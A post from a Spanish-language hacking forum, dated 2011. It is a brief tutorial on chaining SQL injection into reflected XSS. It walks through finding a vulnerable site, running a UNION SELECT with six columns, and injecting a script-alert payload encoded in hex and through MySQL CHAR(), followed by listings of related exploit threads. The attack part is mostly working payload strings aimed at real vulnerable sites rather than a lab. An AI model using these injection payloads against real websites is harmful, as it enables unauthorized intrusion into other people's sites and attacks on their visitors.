XSS no persistente con SQLi

« **en:** Agosto 25, 2011, 12:08:40 am »

Para hacer una inyeccion XSS no persistente a travez de una inyeccion SQL hay que hacer lo siguiente:

Encontramos un sitio vulnerable

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login'

Luego hacemos un UNION con la cantidad de columnas (Ej: 6)

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login UNION SELECT 1,2,3,4,5,6--

Ahi aparecen las columnas vulnerables, entonces es cuando inyectamos nuestro codigo

El original es

<script>alert("XSS");</script>

Pero hay que encodearlo en HEX o usar la funcion CHAR de MySQL

HEX ENCODED:

0x3c7363726970743e616c657274282258535322293b3c2f7363726970743e

MySQL CHAR:

CHAR(60, 115, 99, 114, 105, 112, 116, 62, 97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62)

Espero que les haya gustado!

SQLI tutorial pour débutants ( newbie) ecrite par ..::Key-m0rt::.. Iniciado por ..::key-m0rt::..	Respuestas: 0 Vistas: 1548	Marzo 23, 2010, 12:38:21 pm por ..::key-m0rt::..
LFI+SQLI [Incluyendo ficheros a travez de valores enteros] Iniciado por q3rv0	Respuestas: 4 Vistas: 1583	Julio 24, 2013, 01:43:36 pm por M5f3r0
[Video] Jugando al JuAckEr pt 1. [No es tutorial][SQLi+Deface] Iniciado por Xt3mP	Respuestas: 0 Vistas: 1330	Julio 21, 2010, 07:43:44 pm por Xt3mP
SQLi bypaseando el firewall y pasando el examen! Iniciado por arthusu	Respuestas: 5 Vistas: 2240	Junio 07, 2013, 10:12:11 pm por morodog
Exploit Career jobs wordpress[SQLi] Iniciado por OswireW0rding	Respuestas: 1 Vistas: 1731	Marzo 12, 2014, 10:39:40 pm por .:UND3R:.

Esta es una respuesta al tema: XSS no persistente con SQLi en La plantilla. Bugs y Exploits

XSS no persistente con SQLi

Abnormality

XSS no persistente con SQLi

Similar topics (5)